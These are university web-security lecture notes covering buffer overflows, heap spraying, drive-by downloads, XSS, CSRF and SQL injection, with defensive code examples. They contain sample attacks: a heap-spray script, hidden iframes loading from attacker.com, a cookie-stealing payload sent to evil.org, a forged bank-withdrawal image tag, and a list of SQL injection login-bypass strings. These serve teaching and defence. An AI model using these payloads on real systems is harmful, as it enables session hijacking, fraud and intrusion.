Web Security

Dr. 許富皓
Department of Computer Science and Information Engineering, National Central University


Stack Smashing Attacks

Principle of Stack Smashing Attacks

Overwrite control transfer structures, such as return addresses or function pointers, to redirect program execution flow to code of the attacker's choosing.

Attack strings carry both the code and the address(es) of the code's entry point.

A Linux Process Layout and Stack Operations

[Figure: Linux process memory layout, from high address to low address: kernel address space, stack, libraries, heap, BSS, data, code. The stack holds env, argv and argc followed by the frames of main, G and H; EIP marks the instruction currently executing.]

main()
{
  :
  G(1);
}

void G(int a)
{
  :
  H(3);
}

void H(int c)
{
  :
}

Explanation of BOAs (1)

G(int a)
{
  H(3);
add_g:
}

H(int b)
{ char c[100];
  int i=0;
  /* no bounds check: input longer than c[] overruns the rest of H's frame */
  while((c[i++]=getch())!=EOF)
  {
  }
}

[Figure: H's stack frame, from esp (low address) up towards G's stack frame (high address): c[0] ... c[99], i, the saved frame pointer ebp (the address of G's frame pointer), the return address add_g, and the argument b. With the input string "abc", the characters a, b and c are stored at 0xaba, 0xabb and 0xabc.]

Explanation of BOAs (2)

[Figure: the same frame layout as in (1). The attack string "xx...Injected Code...x y 0xabc" is 108 bytes long (x: 1 byte, y: 4 bytes). The x padding and the injected code are written into c[0] ... c[99], and the trailing value 0xabc overwrites the return address add_g, so that H returns to the injected code at address 0xabc.]

Injected Code

The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege.

The injected code is already in machine instruction form; therefore, a CPU can directly execute it. However, this also means that the injected code must match the CPU type of the attacked host.

Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.


Heap Spray and Drive-by Download

Heap Spray [Wikipedia][Nozzle]

Heap spraying is a technique used in exploits to facilitate arbitrary code execution.

Heap spraying is a security threat using a strategy of allocating many objects containing the attacker’s exploit code in an application’s heap.

Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.

Heap Spray Overview [Puttaraksa]

Implementation - JavaScript

Heap sprays for web browsers are commonly implemented in JavaScript and spray the heap by making copies of a long string and storing these strings in an array, up to the point where enough memory has been sprayed to cover the area that the exploit targets.

P.S.: The long string begins with a NOP sled and ends with shellcode.

Implementation - ActionScript

In July 2009, exploits were found to be using ActionScript to spray the heap in Adobe Flash.

Implementation - Images

Though it has been proven that heap spraying can be done through other means, for instance by loading image files into the process, this has not seen widespread use (as of August 2008).

Memory Corruption Exploit

Sources of Memory Corruption Exploit
• Mishandling Tag Attribute Values
• Virtual Table
• …

Mishandling Tag Attribute Values (1)

HTTP MS IE Malf. IFRAME/EMBED BO [Symantec]

It is reported that an attacker can exploit this condition by creating a malicious Web page containing a malformed IFRAME, FRAME or EMBED tag.

Specifically, the attacker creates the IFRAME, FRAME or EMBED tag by specifying large string values for the 'SRC' and 'NAME' properties.

These values are copied into finite-sized process buffers, resulting in memory corruption.

Mishandling Tag Attribute Values (2) [Julam]

<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
::
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>

Result: eip stops at address 0x769f682f

Mishandling Tag Attribute Values (3) [Julam]

memory = new Array();
for (i=0;i<700;i++)
  memory[i] = block + shellcode;


Virtual Table [Foster et al.]

The virtual table is a lookup table of functions used to resolve function calls in a dynamic/late binding manner.

Class objects and structures are often stored on the heap.

One field of a class object is a pointer to its virtual table, called virtual-function table pointer.

Virtual Table [Foster et al.] – Overview

[Figure: two class objects on the heap, each consisting of a *__vptr field followed by a char a[100] buffer.]

Virtual Table [Ratanaworabhan et al.] – Spraying the Heap

<SCRIPT language="text/javascript">
shellcode = unescape("%u4343%u4343%...");
oneblock = unescape("%u0D0D%u0D0D");
var fullblock = oneblock;
while (fullblock.length<0x40000) { fullblock += fullblock; }
sprayContainer = new Array();
for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; }
</SCRIPT>

[Figure: each sprayed block is a NOP sled followed by the shell code.]


Result

Because the size of the sprayed heap area may be tens of MBs, ASLR may not work as expected.

Drive-by Download Attacks [wikipedia]

Download of spyware, a computer virus, or any kind of malware that happens without the knowledge of the user.

Drive-by downloads may happen by
• visiting a website,
• viewing an e-mail message, or
• clicking on a deceptive popup window.

Clicking on a Deceptive Popup Window

For instance, a user clicks on the window in the mistaken belief that it is an error report from his own PC or that it is an innocuous advertisement popup.

In such cases, the "supplier" may claim that the user "consented" to the download though he was completely unaware of having initiated a malicious software download.

Drive-by Downloads using Web Pages

Features:

1. Same appearance as the original webpage

2. Secret downloads

3. Automatic installation

4. Based on vulnerabilities of browsers, plug-ins, or OSes

[Figure: first stage. A vulnerable browser (client side) loads a page from a good web server over the WWW. The page carries injected references to a malicious web server (attacker.com, bad.htm):]

<iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>

[Figure: second stage. bad.htm on attacker.com, together with a further server attacker2.com, serves the vulnerable browser obfuscated script, for example:]

document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………

Discuss

Why not inject shell code at the first stage? (i.e. inject shell code into the "good web server" directly)

Drive-by Downloads

Why Drive-by Downloads?
• Deploy malware on computers of victims
• Large scale (vs. targeted attacks)
• Bypass firewalls or NAT protection

Current solutions
• Static web-page analysis
• Web-site reputation
• Microsoft Killbit


HTTP Cookie [Wikipedia]

HTTP Cookies

HTTP cookies, sometimes known as web cookies or just cookies, are parcels of text sent by a server to a web browser and then sent back unchanged by the browser each time it accesses that server.

HTTP cookies are used for
• authenticating,
• tracking, and
• maintaining specific information about users, such as site preferences or the contents of their electronic shopping carts.

The term "cookie" is derived from "magic cookie," a well-known concept in Unix computing which inspired both the idea and the name of HTTP cookies.


Cookie Delivery


Examine the Cookies

Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing javascript:alert("Cookies: "+document.cookie) in the browser URL field.

Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

Third-party Cookies

While cookies are only sent to the server setting them or to one in the same Internet domain, a Web page may contain images or other components stored on servers in other domains.

Cookies that are set during retrieval of these components are called third-party cookies.

Using Third-party Cookies to Track a User's Activity

Advertising companies use third-party cookies to track a user across multiple sites.

In particular, an advertising company can track a user across all pages where it has placed advertising images or Web bugs.

Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
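The distinction drawn on the two slides above, as an added example that is not part of the lecture: given the page a user is viewing and the Set-Cookie headers observed while the browser fetched the page's components, each cookie is labelled first-party or third-party by comparing the cookie's scope with the page's site. The page URL, the resource URLs and the cookie headers are constructed for the example, and "site" is approximated by the last two host labels rather than the Public Suffix List that browsers consult.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlsplit


def site_of(host):
    """Approximate the site (registrable domain) of a host by its last two
    labels, e.g. ads.tracker.example -> tracker.example.
    Simplification: browsers use the Public Suffix List, under which a name
    such as example.co.uk needs three labels."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_cookies(page_url, responses):
    """page_url: the document the user is viewing.
    responses: (resource URL, Set-Cookie header) pairs seen while fetching
    the page's images and other components.
    Returns (cookie name, scope, 'first-party' | 'third-party') per cookie."""
    page_site = site_of(urlsplit(page_url).hostname)
    result = []
    for resource_url, set_cookie in responses:
        resource_host = urlsplit(resource_url).hostname
        jar = SimpleCookie()
        jar.load(set_cookie)
        for name, morsel in jar.items():
            # A Domain attribute may widen the cookie's scope within the
            # setting server's own site, never to a different site.
            scope = (morsel["domain"] or resource_host).lstrip(".")
            party = "first-party" if site_of(scope) == page_site else "third-party"
            result.append((name, scope, party))
    return result


# Constructed sample: a news page embedding its own CDN logo and two
# components hosted by an advertising network.
SAMPLE_PAGE = "http://news.example.com/story.html"
SAMPLE_RESPONSES = [
    ("http://cdn.example.com/logo.png", "prefs=dark; Domain=.example.com; Path=/"),
    ("http://ads.tracker.example/banner.gif", "uid=7f3a9c; Path=/"),
    ("http://img.tracker.example/pixel.gif", "seen=story1; Domain=.tracker.example"),
]

if __name__ == "__main__":
    for name, scope, party in classify_cookies(SAMPLE_PAGE, SAMPLE_RESPONSES):
        print(f"{name:6} scoped to {scope:22} {party}")
```

Every cookie reported as third-party belongs to a site that will receive it again on any other page embedding that site's images, which is exactly the cross-site tracking channel the slide describes.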


Tracking Example

Privacy Threat

The possibility of building a profile of users has been considered by some a potential privacy threat, even when the tracking is done on a single domain, but especially when tracking is done across multiple domains using third-party cookies.

For the above reason, some countries have legislation about cookies.


Cross-site Scripting

Categories

• Non-persistent XSS (Reflected XSS): the most common type nowadays
• Persistent XSS


Non-persistent XSS

Through Hyperlinks

An attacker may be able to embed their malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteria without validating user-supplied input, which consequently forces the execution of code from the evil attacker's server. For example:

<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>

In the attack above, one source is inserting code into pages sent by another source.

It should be noted that this attack:
• disguises the link as a link to http://trusted.org,
• can be easily included in an HTML email message,
• does not supply the malicious code inline; it is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.

[Figure: Web browser exchanging requests and pages with trusted.org.]

Ways to Deploy Hyperlinks

The user will most likely click on this link from another website, an instant message, or simply while reading a web board or email message.

Non-persistent Cross Site Scripting (XSS)

A non-persistent cross-site scripting (XSS) vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system.

By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result in cookie theft, account hijacking, changing of web application account settings, spreading of a webmail virus, etc.

The Most Common Victims of Non-persistent XSS

The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. (Each of these components could generate a web page.)

Additionally, a victim doesn't necessarily have to click on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

Hijack Web Application Sessions

The most popular (and devastating) XSS attack is the harvesting of
• authentication cookies and
• session management tokens.

With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process.

Traditional Non-persistent XSS Web Application Hijack Scenario (1)

1. The attacker investigates an interesting site
   • that normal users must authenticate to gain access to, and
   • that tracks the authenticated user through the use of cookies or session IDs.

2. The attacker finds an XSS-vulnerable page on the site, for instance http://trusted.org/account.asp.

3. Using a little social engineering,
   • the attacker creates a special link to the site and
   • embeds it in an HTML email that he sends to a long list of potential victims.

Traditional Non-persistent XSS Web Application Hijack Scenario (2)

4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:

<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie); </script>">

5. Unknown to the victim, the attacker has now received a copy of their cookie information.

The attacker now visits the web site and, by substituting his cookie information with that of the victim, is now perceived to be the victim by the server application.


Traditional Non-persistent XSS Web Application Hijack Steps [David Endler]


SOLUTIONS AND WORKAROUNDS [David Endler]

For Users

As a web application user, there are a few ways to protect yourself from XSS attacks. The first and most effective solution is to disable all scripting language support in your browser and email reader.

If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages.

Web Application Developers and Vendors

Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes things stored in GET query strings, POST data, cookies, URLs, and in general any persistent data that is transmitted between the browser and web server.

User Input Filtering

The best philosophy to follow regarding user input filtering is to deny all but a pre-selected set of benign characters in the web input stream. This spares developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).

Some decent guidelines for input filtering can be found in the OWASP Requirements document “OWASP Guide to Building Secure Web Applications and Web Services".
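The two developer-side defences this deck recommends, worked as an added example that is not code from the slides or from [David Endler], and applied to the search.cgi hyperlink case from the "Through Hyperlinks" slide: an allow-list that denies everything but a pre-selected set of benign characters in the criteria parameter, and HTML escaping of whatever is reflected back to the client. The regular expression, the page markup, the session_cookie_header helper and the sample URLs are assumptions of the example; the unvalidated reflection the slides describe is kept beside the hardened form for comparison.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for the "criteria" parameter: letters, digits, space and a few
# harmless punctuation marks, at most 64 characters. Anything else, including
# < > ' " ; and ?, is rejected outright; nothing has to be blocklisted.
CRITERIA_RE = re.compile(r"[A-Za-z0-9 _.,-]{1,64}")


def criteria_is_allowed(value):
    return CRITERIA_RE.fullmatch(value) is not None


def criteria_from_url(url):
    # The same query-string parsing a search.cgi would perform.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("criteria", [""])[0]


def render_results_unsafe(criteria):
    # The behaviour the slides describe: the value of criteria is echoed
    # without validation, so a <SCRIPT> in the URL becomes part of the page.
    return f"<html><body><p>Results for: {criteria}</p></body></html>"


def render_results(criteria):
    # Output encoding: escape on the way out regardless of what validation did
    # on the way in, so the browser treats the value as text, never as markup.
    return f"<html><body><p>Results for: {html.escape(criteria, quote=True)}</p></body></html>"


def handle_search(url):
    """Request handler combining both layers; returns (status, body)."""
    criteria = criteria_from_url(url)
    if not criteria_is_allowed(criteria):
        return 400, "<html><body><p>Invalid search criteria.</p></body></html>"
    return 200, render_results(criteria)


def session_cookie_header(session_id):
    # Defence in depth for the session-hijack scenario: HttpOnly keeps the
    # cookie out of document.cookie, so a script that does run cannot read it;
    # Secure keeps it off plain HTTP. (Assumed cookie name "session".)
    return f"Set-Cookie: session={session_id}; Path=/; HttpOnly; Secure"


# Constructed inputs: a benign search and the hyperlink payload from the slide.
BENIGN_URL = "http://trusted.org/search.cgi?criteria=web+security"
ATTACK_URL = ("http://trusted.org/search.cgi?criteria="
              "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>")

if __name__ == "__main__":
    for url in (BENIGN_URL, ATTACK_URL):
        status, body = handle_search(url)
        print(status, body)
```

The allow-list rejects the slide's payload before any page is built; even if a value slipped past validation, html.escape turns its angle brackets and quotes into entities, so the script tag never reaches the parser as markup.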

Test

Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to
• upgrades,
• integration of third-party technologies, and
• decentralized website authoring.

Web Application Vulnerability Scanners

Many web application vulnerability scanners are starting to include checks for XSS. The OWASP Testing group plans to produce a methodology for checking XSS on a web application.

WebScarab

Examples Used to Bypass Being Detected

XSS Cheat Sheet


XSS Tool

XSS-Proxy

Cross-site Request Forgery [Wikipedia]


Definition

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.


Background

CSRF vulnerabilities have been known and in some cases exploited since the 1990s.

Because it is carried out from the user's IP address, CSRF is untraceable without proper logging.


Impact

As of 2007 there are few well-documented examples.

About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008.

Customers of a bank in Mexico were attacked in early 2008 with an image tag in email.

Example

One user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob's bank's website (rather than an image file), e.g.,

<img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">

If Bob's bank keeps his authentication information in a cookie and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

Common CSRF Characteristics

• Involve sites that rely on a user's identity
• Exploit the site's trust in that identity
• Trick the user's browser into sending HTTP requests to a target site
• Involve HTTP requests that have side effects


Common CSRF Victims

At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.

A user that is authenticated by a cookie saved in his web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action.


Common CSRF Pitfalls

CSRF attacks using images are often made from Internet forums, where users are allowed to post images but not JavaScript.

CSRF Assumptions

This attack relies on a few assumptions:
• The attacker has knowledge of sites on which the victim has current authentication (more common on web forums, where this attack is most common).
• The attacker's "target site" has authentication cookies, or the victim has a current session cookie with the target site.
• The "target site" doesn't have secondary authentication for actions (such as form tokens).

Example

Assume a script in the document at http://store.company.com/dir/other.html executes the following statement:

document.domain = "company.com";

After that statement executes, the page would pass the origin check with http://company.com/dir/page.html.

However, by the same reasoning, company.com could not set document.domain to othercompany.com.
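A small model of the document.domain rule just stated, added here as an example that is not from the slides: can_set_domain accepts only the document's own host or a superdomain of it on a label boundary, and same_origin applies the relaxed comparison only when both documents have set document.domain, which is what browsers require. The Document class and slide_scenario are constructed for the example, and refusing single-label values stands in for the Public Suffix List check a real browser performs.

```python
from urllib.parse import urlsplit


def can_set_domain(host, value):
    """True if a document at `host` may assign document.domain = value:
    store.company.com -> company.com is allowed, company.com ->
    othercompany.com is not. A single-label value such as "com" is refused
    as a crude stand-in for the browser's Public Suffix List check
    (simplification made for this example)."""
    host, value = host.lower(), value.lower()
    if "." not in value:
        return False
    return host == value or host.endswith("." + value)


class Document:
    """Minimal model of a document's origin plus the document.domain setter."""

    def __init__(self, url):
        parts = urlsplit(url)
        self.scheme, self.host = parts.scheme, parts.hostname
        self.domain = None   # stays None until the page assigns document.domain

    def set_domain(self, value):
        if not can_set_domain(self.host, value):
            raise ValueError(f"{self.host} may not set document.domain to {value!r}")
        self.domain = value.lower()


def same_origin(a, b):
    """Origin check: scheme and host must match, unless both documents have
    opted in by setting document.domain to the same value. Browsers require
    both sides to set it, even the one whose host already equals the value."""
    if a.scheme != b.scheme:
        return False
    if a.domain is not None and b.domain is not None:
        return a.domain == b.domain
    if a.domain is None and b.domain is None:
        return a.host == b.host
    return False   # one side relaxed its domain, the other did not


def slide_scenario():
    """The slide's two pages, before and after both set document.domain."""
    other = Document("http://store.company.com/dir/other.html")
    page = Document("http://company.com/dir/page.html")
    before = same_origin(other, page)
    other.set_domain("company.com")
    page.set_domain("company.com")
    after = same_origin(other, page)
    return before, after, can_set_domain("company.com", "othercompany.com")


if __name__ == "__main__":
    print(slide_scenario())   # expected (False, True, False)
```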

Prevention

For the web site, switching from a persistent authentication method (e.g. a cookie or HTTP authentication) to a transient authentication method (e.g. a hidden field provided on every form) will help prevent these attacks. [Slide annotation: hidden field of a form]

A similar approach is to include a secret, user-specific token in forms that is verified in addition to the cookie. [Slide annotation: a field of a form filled out by a user]
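The token check described on the Prevention slide, worked as an added example that is neither the slides' nor Wikipedia's code: a toy bank issues one secret, user-specific token per session, places it in a hidden form field, and verifies it in addition to the session cookie before acting; it also refuses GET requests for withdrawals, since an image load can only issue a GET. The Bank class, its routes, the cookie name and the bob/mallory amounts are constructed for the example, following the <img> scenario on the Example slide.

```python
import hmac
import secrets


class Bank:
    """Toy server keeping one record per logged-in session (constructed)."""

    def __init__(self):
        self.sessions = {}              # session cookie value -> session record
        self.balances = {"bob": 5_000_000}

    def login(self, user):
        sid = secrets.token_urlsafe(32)
        # One unguessable token per session, kept server-side, never in a cookie.
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def withdraw_form(self, cookies):
        """The transient credential: a hidden field holding the session's token,
        which only pages rendered for this session can contain."""
        sess = self.sessions.get(cookies.get("session"))
        if sess is None:
            return None
        return ('<form method="POST" action="/withdraw">'
                f'<input type="hidden" name="csrf_token" value="{sess["csrf"]}">'
                '<input name="amount"><input name="for"></form>')

    def withdraw(self, method, cookies, form):
        """Returns (status, message). Every forged request is refused before any
        state changes: wrong method, no session, or a missing/incorrect token."""
        if method != "POST":
            return 405, "withdrawals must be POSTed"
        sess = self.sessions.get(cookies.get("session"))
        if sess is None:
            return 401, "not logged in"
        token = form.get("csrf_token", "")
        if not hmac.compare_digest(token, sess["csrf"]):
            return 403, "missing or invalid CSRF token"
        amount = int(form["amount"])
        user = sess["user"]
        if amount > self.balances[user]:
            return 400, "insufficient funds"
        self.balances[user] -= amount
        return 200, f"{user} sent {amount} to {form['for']}"


def extract_token(form_html):
    # What a page rendered for the legitimate user does: read the hidden field.
    marker = 'name="csrf_token" value="'
    start = form_html.index(marker) + len(marker)
    return form_html[start:form_html.index('"', start)]


def demo():
    bank = Bank()
    cookie = {"session": bank.login("bob")}
    # 1. Mallory's <img src="http://bank.example/withdraw?...">: Bob's browser
    #    attaches his cookie, but the request is a GET carrying no token.
    forged_get = bank.withdraw("GET", cookie, {"amount": "1000000", "for": "mallory"})
    # 2. A cross-site POST also lacks the token, because another site cannot
    #    read the form the bank rendered for Bob.
    forged_post = bank.withdraw("POST", cookie, {"amount": "1000000", "for": "mallory"})
    # 3. Bob's own submission carries both the cookie and the token.
    token = extract_token(bank.withdraw_form(cookie))
    genuine = bank.withdraw("POST", cookie, {"csrf_token": token, "amount": "100", "for": "rent"})
    return forged_get[0], forged_post[0], genuine[0], bank.balances["bob"]


if __name__ == "__main__":
    print(demo())   # expected (405, 403, 200, 4999900)
```

hmac.compare_digest is used for the token comparison so that its running time does not depend on how many leading characters match.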


SQL Injection [SK]

What is SQL Injection?

Many web pages take parameters from web users and make SQL queries to the database. Take for instance when a user logs in to a web page: the web page accepts that user name and password and makes an SQL query to the database to check if the user has a valid name and password.

With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

SQL Injection Attack Channels

SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy.

It attacks the web application (like ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.

What Should You Look for?

Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc.

Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for the "FORM" tag in the HTML code. You may find something like this in some HTML code:

<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>

Everything between the <FORM> and </FORM> has potential parameters that might be useful (exploit wise).

What If You Can't Find Any Page That Takes Input?

You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:

http://duck/index.asp?id=10

How Do You Test If It Is Vulnerable?

Start with the single quote trick. Input something like:

hi' or 1=1--

into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If luck is on your side, you will get logged in without any login name or password.


Hidden Field

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.

Example:

<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>

Database Table Example [CQU]

Database Table product

PName      PCategory   price   number   bar code
bread      food           30      100   100-234-7
cake       food          300       20   100-987-6
cookie     food           50       70   100-812-9
model car  toy           200       20   300-567-7
figure     toy           300       80   300-987-9
paper      stationery    0.5     5000   981-897-7
pen        stationery     20      300   981-967-0

Web Application Input and Its Corresponding SQL Query

Take an ASP page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP page might contain the following code:

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.

Why ' or 1=1-- ?

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals "food' or 1=1-- "; if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".


Other Crafted Input (1)

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Other Crafted Input (2)

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
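The ASP on the "Web Application Input" slide builds its query by string concatenation. The added example below, which is not code from the slides or from [SK], reproduces that construction in Python against an in-memory copy of the product table, beside the parameterised form that keeps the crafted inputs listed above from changing the query. sqlite3 stands in for MS SQL Server (it honours the -- comment but not the # form), and the column named "bar code" on the slide is called barcode here.

```python
import sqlite3

# Constructed copy of the slides' "product" table (the [CQU] example).
PRODUCTS = [
    ("bread", "food", 30, 100, "100-234-7"),
    ("cake", "food", 300, 20, "100-987-6"),
    ("cookie", "food", 50, 70, "100-812-9"),
    ("model car", "toy", 200, 20, "300-567-7"),
    ("figure", "toy", 300, 80, "300-987-9"),
    ("paper", "stationery", 0.5, 5000, "981-897-7"),
    ("pen", "stationery", 20, 300, "981-967-0"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (PName TEXT, PCategory TEXT, "
                 "price REAL, number INTEGER, barcode TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?, ?, ?)", PRODUCTS)
    return conn


def vulnerable_query(conn, v_cat):
    # Mirrors the ASP on the slide: the user's value is glued into the SQL
    # text, so a quote in v_cat closes the string literal and whatever follows
    # is parsed as SQL.
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def safe_query(conn, v_cat):
    # Parameterised query: v_cat is bound as a value by the driver and is never
    # parsed as SQL, so "food' or 1=1--" is simply a category that does not exist.
    return conn.execute("SELECT * FROM product WHERE PCategory=?", (v_cat,)).fetchall()


def compare(v_cat):
    """Row counts the two implementations return for one input."""
    conn = make_db()
    try:
        return len(vulnerable_query(conn, v_cat)), len(safe_query(conn, v_cat))
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("food", "food' or 1=1--", "food' or 'a'='a", "' or 1=1--"):
        vuln, safe = compare(value)
        print(f"{value!r:22} concatenated: {vuln} rows   parameterised: {safe} rows")
```

With the concatenated query every crafted input returns the whole table, while the parameterised query returns three rows for food and none for any of the crafted values, because the quote and the comment marker never reach the SQL parser as syntax.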